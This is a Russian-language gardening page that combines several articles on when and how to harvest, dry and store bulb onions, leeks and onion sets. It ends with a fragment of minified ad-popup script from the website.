5 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Тонкости уборки и хранения лука

Тонкости уборки и хранения лука

Выращивание и уход за овощами занимает у огородника много времени. Но все усилия пойдут насмарку, если процесс заготовки культур пройдет с нарушением. В нашем обзоре мы расскажем, как правильная уборка лука влияет на длительность хранения, а также какие условия нужны, чтобы сохранить весь урожай.

Чтобы сохранить урожай лука, нужно собирать его в соответствии с правилами

Уборка

Сбор лука – это важный процесс, который поможет в дальнейшем сохранить урожай до следующего сезона. Нельзя раньше убрать овощи, так как они не успеют созреть и получить защитные свойства. Если сбор начнется позднее, тогда головки могут растрескаться, что ухудшает характеристики хранения. Каждому конкретному сорту отводится максимальный срок, до которого он успевает сформироваться:

  • репчатый – 3-4 месяца после посадки;
  • порей – 150-180 дней.

У каждого из видов имеются специфические особенности, о которых хотелось бы поговорить. Репчатый лук убирают в сухую, теплую погоду. Чаще всего, это происходит в августе, когда перья пожелтели и легли к земле. В этот период растение не тратит силы на листву, поэтому луковицы наливаются. Показателем того, что урожай пора собирать, становятся тонкие шейки у основания.

С выкопанных луковиц нельзя сбивать землю, она отпадет сама

Головки репчатого лука аккуратно подкапывают, стараясь не задеть корни и основание. Помните: не сбивайте землю с луковиц и не бросайте их грубо. Травмированный урожай не пролежит долго, а заболевшие экземпляры передадут инфекцию здоровым. Комбайн для уборки лука – это удобный аппарат, который осторожно выкапывает головки и по ленте собирает их в специальном отсеке.

Техника для мелких хозяйств нерентабельна из-за высокой стоимости, поэтому на дачных участках сбор урожая происходит ручным методом.

Сроки сбора порея зависят от его сорта, но чаще всего проводят за несколько дней до наступления первых морозов. Под каждое растение аккуратно подкапывают штыком лопаты и вынимают из земли. Нельзя вырывать овощи или небрежно бросать их в кучу – поврежденный стебель и корень станет очагом распространения заболеваний, поэтому не подходит для длительного хранения.

Лук порей нужно доставать из земли аккуратно, чтобы не повредить

Сушка

Чтобы репчатый лук сохранить до следующего сезона, нужно тщательно просушить. Это обязательная процедура, без которой невозможно хранение. Головки раскладываются тонким слоем и происходит улетучивание лишней жидкости из шелухи. Чаще всего используются:

  • уличные крытые навесы;
  • чердачные помещения;
  • балкон или веранда квартиры.

Обратите внимание на циркуляцию воздуха – чем она выше, тем лучше происходит сушка луковиц. В душных, непроветриваемых комнатах лук упреет и начнутся разрушительные процессы внутри корнеплодов. Огородники рекомендуют выставлять урожай на открытое солнце на несколько часов. Естественные ультрафиолетовые лучи убивают болезнетворные бактерии.

Но нельзя и пересушивать лук, т.к. сухие наружные чешуи трескаются, отделяются, появляются оголенные луковицы, которые потом плохо сохраняются.

Оптимальная температура для сушки – от 25 до 30 градусов. За несколько недель влажность чешуи уменьшается на четверть, что позволяет луку сопротивляться инфекции, температурным колебаниям при хранении. Чем плотнее прилегают чешуйки к головкам, тем дольше экземпляры пролежат. Но существуют сорта репчатого лука, которые не приспособлены к длительному сбережению, поэтому никакими методами вы не заставите увеличить сроки годности.

Луковицы следует сушить в теплом светлом месте

Хранение

Перед тем, как весь урожай перенесете на постоянное место хранения, нужно отсортировать весь лук и отобрать больные, травмированные экземпляры. Одна мягкая луковица за несколько недель может испортить многомесячный труд по выращиванию овощей. Головки с небольшим количеством шелухи используют в течение месяца, после сбора урожая.

Подвальное помещение за месяц до закладки белят известью и тщательно проветривают. Нельзя хранить лук с овощами, требующими повышенную влажность. Испаряющаяся влага – это отличная среда для гниения и возникновения болезней, поэтому обеспечьте хорошую циркуляцию воздуха.

Порей сортируют и на длительное хранение отправляют только здоровые растения. Если вы заметили темные пятна или порезы на стеблях, листве, то такие экземпляры изолируйте и употребите в первую очередь. Такой вид лука отлично хранится в слегка влажном песке в вертикальном положении, дополнительно происходит дозревание урожая.

На хранение отправляют только самые качественные стебли порея

Чтобы надолго сберечь овощи, у лука порея рекомендуется обрезать листву на треть длины. В этом случае не произойдет засыхание и деформация перьев. Корневую систему лучше не трогать, так как тогда сокращаются сроки хранения. Экземпляры без корней съедаются сразу. Если у вас нет достаточно места для сбережения порея, тогда его можно нарезать крупными кольцами и высушить. В таком виде сырье лежит в открытых бумажных пакетах.

В овощном отсеке бытового холодильника порей хранится в течение двух месяцев. Обязательным требованием для сохранения является:

  • очищение от грунта с поверхности;
  • удаление вялых, гнилых листьев;
  • вакуумная упаковка.

Лук репку можно сплести в косы и развесить в прохладном помещении с хорошей вентиляцией. Небольшое количество урожая можно сохранить в старых капроновых колготках или гольфах. Тонкий материал отлично пропускает воздух, поэтому не будет загниваний.

Помните: чтобы лук не начал расти, температура окружающей среды не должна превышать +20, оптимальной огородники считают +15. Крайний порог не опускается ниже 0.

Уборка и хранение лука репки и порея – это важная процедура, о которой должен помнить каждый огородник. Любое нарушение временного или температурного режима сведет к нулю все месяцы выращивания овощей. Придерживаясь наших рекомендаций, ваши растения будут лежать долго.

Лук после уборки с грядки

Лук после уборки с грядки необходимо сохранить как можно дольше. Для этого необходимо соблюдать некоторые нюансы, о которых я напишу в данной заметке. И так…

Выращивание лука прошло успешно и настало время уборки лука. И встает вопрос, когда убирать лук с грядки на хранение? Ведь начать собирать его вовремя крайне важно: недозрелый овощ обладает очень сочной шейкой, из-за чего в скором времени он начнёт гнить. А у перезрелого может треснуть репка лука, что также приведёт к гниению. Зрелость лука можно проверить несколькими способами. Первый, потрогать шейку лука. Если она мягкая но не ложится на грядку, то можно выкапывать. Ещё один способ понять, когда стоит убирать лук, это посмотреть на листья. Когда примерно половина листьев пожелтеет и поляжет, можно будет начать выкапывать. Лук после уборки не требует особых хлопот. Но можно облегчить себе жизнь парочкой простых хитростей, которые помогут вам правильно собрать лук.


Фото: Лук после уборки

Во-первых, листья нельзя срезать. Это истощает корнеплод, что приводит к его скорой гибели. Также, если сроки уже подошли, а лук еще не выглядит спелым, можно чуть обнажить луковицу. Таким образом, она будет получать больше солнца. И еще один совет, не стоит выкапывать его, если земля влажная. В этом случае, лук после уборки стоит сразу же отряхнуть от земли, она может привести к гниению. Можно начинать выборочно выкапывать некоторые корнеплоды, у которых листья совсем увяли. Т.к. после созревания питание листьев резко размягчается. Не стоит выкапывать весь лук разом, потому что может погибнуть часть луковиц, которая ещё не созрела. Но так же, не стоит ждать созревания всего урожая: корнеплоды начнут гнить ещё в земле.

Лук после уборки.

Лук после уборки необходимо сразу же отчистить от земли. Но ни в коем случае ими нельзя стучать даже легонько о землю. Есть большой шанс повредить корнеплод. Лучше всего землю бережно убирать руками, чтобы не повредить. Не стоит также мыть луковицы, это может привести к их преждевременному гниению. Листья обычно лучше не срезать, но если их слишком много, то можно обрезать там, где начинают разветвляться перья. Как только мы закончили очищать землю лук лучше сразу перенести на место для сушки. Хотя многие и говорят оставлять урожай на солнце на несколько дней, но это ни в коем случае нельзя делать, потому что солнце обжигает луковицы, что негативно сказывается на сроках хранения. Можно оставить под солнцем лишь на несколько часов для дезинфекции, но ни в коем случае не под дождём.


Фото: Как сушить лук после уборки

Как сушить лук после уборки?

Как только мы собрали урожай, сразу появляется вопрос: как сушить лук после уборки? Корнеплоды стоит разложить на поддонах под навесы. Если корнеплоды лежат на улице, то нужно на ночь накрывать их плёнкой — для того, чтобы не попала роса. Также, необходимо каждый день проверять корнеплоды на признаки гниения. Можно потрогать шейку корнеплода, если она влажная, то это значит только одно: луковица начала гнить и его нужно как можно быстрее выкидывать. Лук обычно сушится около 8-12 дней, и проверить, можно ли лук убирать на длительное хранение очень просто. Нужно попытаться просунуть руку между луковицами. Если рука прошла без всяких проблем, то лук можно приготавливать для хранения на зиму. Но, если вы застопорились где-то, луковицы стоит ещё посушить. Оставить можно только абсолютно здоровый лук, поэтому чем чаще проверять корнеплоды, тем больше шансов на то, что лук переживет зимовку. Если у вас лука не много, то можно плести лук косой и хранить в таком виде всю зиму.

Хранение лука после уборки.

Когда стало понятно, что лук готов к зимовке, необходимо знать как правильно его хранить. Лучше всего хранить лук в сухом подвале, где температура от 0°С до 6°С. В таком помещении у нас получится заставить корнеплоды «уснуть». Квартира тоже может стать местом хранения, но только если комнатная температура будет около 22-24°С и не опустится ниже 20°С. Худшая температура хранения для лука это от 12°С до 18°С. От такого температурного режима луковицы скорее всего начнут расти листья. Не стоит лук ставить в помещения с высокой влажностью или недалеко от источника тепла.

Например, рядом с батареей центрального отопления. В первом случае, лук может начнёт гнить, а возле батарей он сильно усохнет и потеряет массу. Для хранения лучше всего использовать контейнеры средних размеров обязательно с вентиляцией. Не стоит засыпать всё в один огромный мешок, а лучше разложить в несколько маленьких. В таком случае мы не дадим испортиться урожаю. Не стоит использовать пакеты из полиэтилена, в них лук начнет очень скоро потеть, а потом и гнить. Так же стоит учесть, что многие сорта можно не хранить, а сажать лук под зиму. И тогда можно убрать ранний урожай.

Применяйте мой опыт и хранение лука после уборки с грядки не составит у вас труда. Если статья была полезна, оставляйте комментарии и делитесь заметкой в соцсетях.

Правила уборки и хранения репчатого лука

Практически ни один огород не обходится без грядок с луком. При выращивании этого овощного растения важно знать, когда следует убирать урожай и как правильно его хранить.

Когда убирают урожай с грядок

Чтобы лук пролежал длительное время на хранении, его необходимо своевременно убрать. Мы подскажем, как определить, готово ли овощное растение к уборке по внешним признакам, с помощью вычислений математическим способом либо по лунному календарю. Убирать луковицы необходимо своевременно. От соблюдения правильных сроков зависит уровень урожая, его качество и длительность лёжки. Именно к моменту, когда стебли упали на грядку, в луковицах собирается максимальное количество ценных элементов.

Слишком ранняя уборка лука с грядки приводит к тому, что дальше через ещё толстую и открытую шейку в луковицы проникают болезни, которые способны уничтожить большую часть урожая. А у тех луковиц, выдёргивать которые стали слишком поздно, повторно отрастают корешки, что также делает их уязвимыми к болезням.

По внешним признакам

Есть 3 внешних признака, по которым огородники определяют, что лук можно выкапывать и помещать на хранение:

  1. Пожелтение, усыхание и полегание стеблей.
  2. Утончение и усыхание шейки у луковицы.
  3. Усыхание верхнего слоя кожуры на головке.

Обычно такие признаки наблюдаются в августе.

Математический способ

Если внешние признаки вызывают сомнение, то можно подстраховаться и подсчитать день уборки с помощью несложных математических подсчётов. Для этого необходимо помнить точную дату посадки овощного растения. К ней нужно прибавить 90–150 дней. Какое точно количество дней нужно прибавить, будет зависеть от посаженного сорта. Так, скороспелые сорта требуют уборки спустя 90 дней, среднеспелые — через 120, среднепоздние — спустя 140, поздние — через 150.

При подсчётах таким образом также нужно учитывать, какая погода стояла во время созревания урожая. Если лето выдалось тёплым и солнечным, то созревание овоща может произойти и немного раньше. И, наоборот, при холодной погоде срок уборки может быть на некоторое время отложен.

По лунному календарю

Некоторые огородники высчитывают готовность овоща к уборке, пользуясь лунным календарём. Ориентироваться по нему легко и просто. Все овощи, которые растут под землёй, рекомендуется убирать, когда Луна находится в фазе убывания. Именно в это время соки растения направляются в луковицу. А вот после новолуния они устремляются в стебли. Следить за лунными фазами можно самостоятельно, просто наблюдая за состоянием Луны, либо ориентироваться по календарю.

Как подготовить корнеплоды к уборке

Срок уборки лука можно ускорить. Это необходимо делать, если овощ ещё не дозрел, а вскоре обещают холодную или дождливую погоду.

Огородники советуют 2 способа:

  1. Откинуть от стеблей почву. Так стебли начнут в скором времени желтеть.
  2. Укоротить лопатой корни до 5–6 см.

А вот обрезать зелёные стебли не нужно. Так луковицы могут не дозреть. Перед тем как приступать к уборке, растение нужно соответствующим образом подготовить.

Для этого нужно проделать следующие манипуляции:
  1. В конце июня — в июле (в зависимости от региона выращивания) пригнуть зелень к почве. Так можно добиться вызревания более крупных луковиц, поскольку все питательные вещества будут направлены не на развитие стеблей, а в рост подземной части.
  2. Прекратить поливы за 2 недели до уборки. В противном случае вызревание может затянуться.

Технология уборки репчатого лука

Репчатый лук убирают двумя способами:

В первом случае, если грунт рыхлый, то лук нужно аккуратно вытаскивать за перья руками. При уборке из тяжёлых грунтов потребуется лопата либо вилы. Этими инструментами производят лёгкое подкапывание головок. Механизированный способ применяют для сбора больших объёмов урожая. Используют специальные лукоуборочные комплексы.

Правила уборки лука

Чтобы получить качественный урожай, способный храниться длительное время, его нужно убрать не только в срок, но и правильно.

Существует несколько правил сбора:
  1. Приступать к уборке в момент, когда на землю упало 60–80% стеблей. Если полегли все перья, вкусовые качества луковиц будут ниже.
  2. Масса плодов при уборке должна составлять 15–23% от веса всего растения.
  3. Убрать урожай необходимо за 10 дней (именно столько длится период от массового до полного полегания пера).
  4. Планировать сбор нужно на утро, чтобы к вечеру головки смогли просохнуть.
  5. Уборку необходимо производить лишь в хорошую погоду.
  6. После вытягивания очищение головок от почвы производят лишь вручную, чтобы их не повредить.
  7. Ботву нужно отрезать лишь после полного просушивания.
  8. Если просушивание осуществляется на открытой грядке, то на ночь головки нужно укрывать полиэтиленовой плёнкой.

Правила сбора севка

Семенные плоды необходимо убирать, придерживаясь следующих правил:

  1. Приступать к уборке, когда большая часть стеблей лежит на земле, однако имеются ещё стоячие перья. Это происходит обычно спустя 3 месяца после посадки.
  2. Оптимальная температура для уборки — +20°С.
  3. Если на планируемые даты уборки прогнозируется дождливая погода, то плоды можно выкопать немного раньше. Это позволит уберечь головки от повторного выпускания корней и загнивания. Дозревание плодов нужно произвести в ходе сушки.
  4. Ускорить процесс уборки можно при помощи механизации — использования лукоподъёмника.

Особенности сбора лука в неблагоприятных погодных условиях

В регионах с неблагоприятным климатом процесс уборки овощного растения будет несколько отличаться. Например, если на территориях с отличным климатом для ведения сельского хозяйства плоды извлекают из земли во второй-третьей декадах августа, а в средней полосе — с конца лета до начала осени, то в холодных районах процесс уборки нужно запланировать на 1–2 недели раньше.

Для посадки в таких регионах обычно выбирают сорта с ранним и среднеранним сроком созревания. Ниже содержатся рекомендации по уборке головок в различных регионах России. Однако в любом случае срок сбора урожая будет зависеть от наблюдающихся погодных условий, сорта и внешних признаков созревания.

Регион Срок уборки
в Нижегородской, Вологодской, Ленинградской области середина — вторая половина августа
в Удмуртии конец августа
в Кемеровской области с начала августа
в областях Чернозёмного района конец августа — начало сентября

Хранение урожая

Чтобы овощ пролежал долго и сохранил свои ценные вещества, его нужно правильно хранить и подготовить к хранению. Подготовка будет заключаться в послеуборочной обработке, а именно в тщательной просушке луковиц и обрезке корешков и перьев.

Хранение репчатого лука

Вот несколько способов, как его сушить:

  1. Разложить одинарным слоем на открытом воздухе, периодически переворачивая головки для равномерного подсушивания.
  2. Поместить луковицы в хорошо проветриваемое помещение. Можно положить их в сетки либо подвесить к потолку.
  3. Сплести в пучки, косы и подвесить под навесом.

Процедура сушки позволяет уберечь головки от гниения. По времени она занимает около 2 недель. После неё необходимо произвести обрезку перьев, корешков и выбраковку. Нельзя допустить, чтобы среди луковиц, отправленных на хранение, были порченные, подгнившие, с вмятинами и царапинами. В противном случае они заразят другие плоды. Также нужно выбраковать недозревшие, слишком мелкие и перезревшие луковицы.

После этого можно помещать лук на хранение в такие условия:

  • погреб с температурой воздуха 0…+3°С и влажностью до 85%;
  • комната с температурой до +22°С и влажностью 50–70%.

В погребе плоды нужно хранить в деревянных ящиках либо в подвешенном виде заплетёнными в косы, пучки или в сетках. В таре луковицы можно пересыпать песком. Обязательными условиями для длительной сохранности лука являются хорошая вентиляция и периодический осмотр со своевременной выбраковкой некачественных луковиц. В домашних условиях головки можно сберегать в ящиках из дерева, картона, плетёных корзинах, мешках из ткани.

Они не должны стоять на солнце. Их нужно поставить в тёмное место. Для экономии места лук можно засушить. Очищенные луковицы нужно нарезать кольцами и разложить на противень в один слой, а затем поставить в духовку. Сушить при температуре +50…+60°С 3–4 часа. Затем кольца нужно поместить в стеклянную банку.

Как хранить лук-севок

Лук, предназначенный под весенний посев, после уборки следует перебрать и отсортировать. Нужно отобрать целые, неповреждённые и неподгнившие экземпляры. Также нужно отобрать овсюжок — очень мелкие плоды (меньше 1 см в диаметре), которые не долежат до весны. Они пригодны для высадки под зиму. Затем луковицы нужно хорошо просушить. Сушка осуществляется такими же способами, которые описаны в подразделе выше. Севок можно хранить тёплым и холодным способом. Первый предполагает размещение луковиц в комнатных условиях при отсутствии солнечного света, температуре +17…+24°С и влажности 65–72%.

При хранении в холодных условиях (в погребе, подвале, застеклённом, но неотапливаемом балконе) температура должна быть от 0°С до +3°С. Для хранения подходят ящики из дерева, решётчатые контейнеры, мешки из ткани, сетки. Можно также хранить луковицы насыпью 15–20-сантиметровым слоем. Овсюжок хранят в тёмном сухом месте до осени. Посадку зимнего лука осуществляют в начале октября (до первых заморозков), а уборку — спустя 200–250 дней (в зависимости от сорта).

Обычно озимый лук приносит крупные плоды. Итак, лук — это полезный и неприхотливый овощ, который легко вырастить на огороде или дачном участке. Сроки созревания его зависят от времени посадки. Убирать его нужно точно в срок, просчитанный математическим путём, по лунному календарю либо по определённым внешним признакам. Если заложить луковицы на хранение в правильные условия, то они способны лежать до весны.

Тонкости в уборке урожая лука

Важно не просто вырастить на своём огороде хороший урожай, но и правильно собрать его. Особого внимания заслуживает такая популярная культура, как лук. Зная, когда убирать лук с грядки на хранение, удаётся сберечь его на всю зиму. Если огородник совершает ошибку, начиная собирать урожай слишком рано или слишком поздно, то он по мере хранения постепенно гниет и не сохраняется даже до февраля. Спасти такой продукт можно, только заморозив его, предварительно почистив от шелухи.

Время сбора

На срок сбора урожая влияет сочетание ряда факторов. По этой причине, однозначно нельзя сказать, когда убирать лук на зиму. Ежегодно период сбора урожая несколько изменяется. На срок выкапывания влияют:

  • сорт овоща – на него в первую очередь обращают внимание. Он может быть ранне- или позднеспелым. Также, в зависимости от сорта изменяются и признаки спелости;
  • погода – если лето холодное, то период созревания удлиняется на 2-3 недели. В жару лук выкапывают на 10-20 дней раньше;
  • влажность – при влажном грунте не проводят уборку культуры. Если погода сухая, то сбор начинают не ранее, чем через 2 недели после того, как прекратили полив. Если наблюдаются постоянные дожди или ожидается их приближение с задержкой на продолжительное время, то урожай собирают рано, чтобы избежать вымокания луковиц.

Более точно определить время, когда собирать лук с грядки, помогает состояние его перьев. Однако относится это только к его репчатой разновидности.

Сроки уборки лука репчатого надо определять по тому, как выглядят его перья. Как только они пожелтеют и лягут – овощ надо выкапывать.

Не обязательно ждать момента, когда опустятся все перья, так как, скорее всего, в ближайшее время начнутся дожди. Достаточно, чтобы половина перьев стала жёлтой и упала. Если этого не происходит, а на подходе начало затяжных дождей или сильный ливень, то, при условии что с момента посадки прошло не менее 70 дней, можно выкопать урожай. Однако после просушки луковицы надо будет хранить в очень холодном месте и регулярно осматривать на наличие очагов гнили.

Чтобы решить, когда убирать лук в Сибири, также надо придерживаться определенных правил. Из-за резко континентального климата дефицит влаги может стать причиной преждевременного пожелтения. Чтобы избежать этого, при отсутствии дождей следует производить поливку в первые 60 дней роста.

Бывает и так, что по срокам лук пора выкапывать, а он ещё не желтеет. В такой ситуации надо ускорить высыхание растения. Для этого острой, тонкой лопатой подрезают корни растения, лишая его тем самым возможности получать питание. Другой способ ускорить высыхание – это немного раскопать луковицы, оголяя верхнюю часть, что ускорит испарение влаги и приведет к пожелтению перьев. Огородники также советуют, немного подтащить овощ к верху, не вырывая его из земли полностью. Это нарушает его питание и приводит к усыханию надземной части.

Срезать или обрывать зелёные перья нельзя, так как в этом случае образуется ранка на луковице, которая станет входными воротами для гнилостных бактерий. Они, постепенно размножаясь, приведут к порче луковицы. Подземная часть защищена от заражения и будет храниться длительное время, только если перья засохли. Те из них, которые не успели высохнуть к моменту выкапывания лука, отрезают, но только предварительно очистив от земли и пыли и на расстоянии не менее 7 см от луковицы.

Определившись с тем, когда убирать лук с грядки, надо узнать, как правильно это сделать.

Правила сбора

Чтобы решить, когда собирать лук, надо понимать, что делать это возможно не в любой день. Погода должна быть тёплой и сухой, а в идеале – ещё ветряной и солнечной, чтобы выкопанный овощ можно было сразу же положить просыхать.

Чтобы не повредить луковицу, не следует копать очень близко от неё. От ряда лучше отступать 10 см и вертикально вводить лопату, чтобы при её наклоне не разрезать овощ. Немного приподняв землю, надо попробовать тянуть лук, ухватив за основание перьев. Если он легко поддаётся, то его вытаскивают. Когда есть риск оторвать надземную часть, то луковицу выкапывают полностью.

При лёгком и рыхлом грунте лопата не требуется, и лук просто выдёргивают, хватая у самой земли. На хорошо обработанной и непереувлажнённой земле этот способ подходит в большинстве случае.

Вытащенный лук складывают рядом с грядкой головками в одну сторону. Овощ может лежать только в 1 слой. Если погода, когда убирают лук, не предвещает дождя, то можно оставить овощ на несколько дней сохнуть на открытом воздухе; если нет – его сушат на чердаке или в сарае. Далее овощ помещают на хранение.

Уборка лука-порея

В отличие от репчатого, порей не сохнет и собирается вместе с надземной частью. Зелень только немного подрезают сверху. Определить, когда убирать лук-порей, просто. Для этого надо изучить рекомендации на упаковке семян. Внешне зрелость растения определить невозможно, и потому следует придерживаться инструкции.

Лук-порей, когда убирают, не оставляют просыхать под ярким солнцем, так как это испортит его зелень. Также можно оставлять в земле до заморозков, прикрывая нетканкой для защиты от холодного воздуха. В этом случае зелень можно будет обрывать почти до самой зимы. Весь урожай оставлять на такой срок не следует. Перед тем, как отправить лук на хранение, с него удаляют сухие и портящиеся листья, хорошо промывают его и, обсушив, кладут в полиэтиленовых пакетах в холодильник.

Хранение

Репчатый лук после полного высушивания обрезают, оставляя шейку от зелёной части высотой в 5 см. Корни обрезают так, чтобы не повредить луковицу. Рассортировав овощи по размеру, их помещают в проветриваемые ящики или связывают и подвешивают под потолком в прохладном сухом месте.

Раз в неделю надо просматривать собранный урожай на случай его порчи. Если обнаруживаются подгнивающие луковицы, они срочно удаляются.

Запрещается помещать данное растение на хранение в полиэтиленовые пакеты, так как в них без доступа воздуха он начнёт сыреть и гнить. При таком неграмотном хранении можно потерять весь урожай.

Если лук собран вовремя и хранится правильно, можно сберечь его до следующего сезона.

Уборка и хранение урожая лука

При выращивании овощей важно не только вырастить и собрать урожай, но и обеспечить его сохранность. Чтобы выращенный собственными руками лук был на вашем столе до самой весны, следует соблюдать ряд определенных правил по его уборке и хранению.

Урожай: сроки сбора овощей

В зависимости от сорта луковицам для созревания требуется от 90 до 130 дней. При ранней уборке овощи не успевают сформировать защитный слой, при позднем сборе они могут потрескаться. О том, что созревание закончилось, сигнализирует пожелтение и полегание пера, обычно сбор урожая лука приходится на конец июля-начало августа. Но иногда перо долго остается зеленым и не ложится на землю, хотя календарные сроки созревания подошли. Ускорить созревание помогут несколько несложных приемов:

1. Луковицы подкапывают лопатой, отрывая корневую систему от почвы. В результате снабжение питательными веществами ухудшается, лук быстрее созревает.

2. Приподнимание луковиц вилами оказывает тот же эффект, что и при предыдущем способе.

3. Проводится подрезание пера, но при таком способе теряется часть урожая.

4. За 2-3 недели до уборки прекращают полив, подкормку и рыхление лука, так как они способствуют росту ботвы. У созревшего лука подсыхают чешуйки, листья и шейка.

Погодные условия

В идеале лук сбор урожая проводят в сухую и солнечную погоду, до первых заморозков. Подмерзшие луковицы непригодны для хранения. Если стоит дождливая погода, лук раскладывают для просушки на сквозняке или в хорошо проветриваемом помещении, периодически переворачивая его.

Правила уборки

Созревание луковиц осуществляется неравномерно, поэтому не стоит ждать, когда все перо ляжет на землю. Уборку начинают при полегании листьев у большинства растений. Не стоит ждать полного усыхания зелени и в дождливую погоду, иначе через несколько дней могут образовываться новые корни, через 10 дней лук может восстановить свой рост.

Если почва рыхлая и мягкая, луковицы осторожно выдергивают из земли, держась за листья. Для извлечения из плотного грунта луковицы вначале подкапывают, а потом аккуратно извлекают, чтобы не допустить отрывания донышка с корневой системой.

Извлеченный из земли лук очищают от земли и раскладывают на грядках слоем 15-20 см. для просушки, периодически переворачивая его. При сухой погоде его оставляют для просушки на 7-10 дней, за этот срок все питательные вещества переходят в головку, ускоряя ее созревание. При этом стоит отметить, что на открытом воздухе на ночь лук оставлять не рекомендуется, августовские ночи влажные и прохладные, могут привести к загниванию луковиц.

Гниение луковиц, причины, способствующие этому

Иногда после уборки лук начинает гнить, причин этому несколько. Скорее всего во время уборки овощи были повреждены, это происходит при отряхивании земли или неправильном выкапывании. Другими факторами, вызывающими загнивание лука, являются плохая просушка перед закладкой на хранение, а также неправильная обрезка.

Если гнилью поражена только внешняя часть луковицы, ее еще можно спасти. Для этого поврежденную чешую убирают, оставляя здоровый слой, который со временем засыхает, образуя защитное покрытие.

Хранение лука

Перед закладкой на хранение всю партию овощей тщательно осматривают, убирая больные и поврежденные экземпляры, ведь одной заболевшей луковицы достаточно, чтобы привести к гниению всего урожая.

При хранении в подвале помещение предварительно готовят, за месяц белят известью и проветривают. Запрещается совместное хранение лука с овощами, которым необходима повышенная влажность. Влажная среда способствует размножению бактерий и быстрому развитию гнилостных процессов, поэтому в помещении должна обеспечиваться постоянная циркуляция воздуха.

Нельзя хранить лук в полиэтиленовых пакетах, при хранении возникает парниковый эффект. Лучше всего использовать для хранения деревянные или бумажные ящики с отверстиями для циркуляции воздуха, плетеные корзины или сетки.

Сортируя лук-порей, на хранение отправляют только здоровые, неповрежденные растения. Экземпляры с порезами или пятнами отправляются в пищу, для хранения они непригодны.

Зелень порея срезают примерно на треть, это убережет ее от засыхания. Корни не трогают, это значительно снижает продолжительность хранения. Стебли с отсутствующими корнями сразу используются в пищу. При недостатке места порей можно высушить и хранить в открытых бумажных пакетах, в таких условиях он сохраняет свой вкус и аромат. В течение 2-х месяцев порей может храниться в вакуумной упаковке в холодильнике, для этого он должен быть очищен от почвенного субстрата, у него не должно быть гнилых и поврежденных листьев. Хорошо сохраняет свои свойства этот вид лука во влажном песке, при хранении в вертикальном положении.

Хранение лука в вертикальном положении

Из репчатого лука плетут косички, при таком способе он хорошо хранится, а поврежденные луковицы легко убрать. Для плетения ботву не обрезают, с луковиц убирают шелуху и обрезают корни. Чтобы косичка была красивой, отбирают только ровные и крупные экземпляры, очень оригинально смотрится косичка, сплетенная из разноцветных луковиц. Ботва для плетения должна быть эластичной, именно такие свойства она приобретает в течение нескольких дней после уборки.

Чем обработать лук перед хранением

Одним из способов, чем обработать лук севок перед хранением, является использование мелового порошка. На 10 кг. овощей используется 200 г. истолченного в мельчайший порошок мела. Порошок наносят на каждую луковицу со всех сторон тонким слоем, не допуская образования плотного «панциря». Мел предохранит урожай не только от загнивания, но и других болезней.

Видео: уборка и хранение урожая лука

От соблюдения правил уборки лука зависит сохранность урожая. Соблюдение ее сроков и технологии обеспечит вашу семью луком на весь зимний период.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
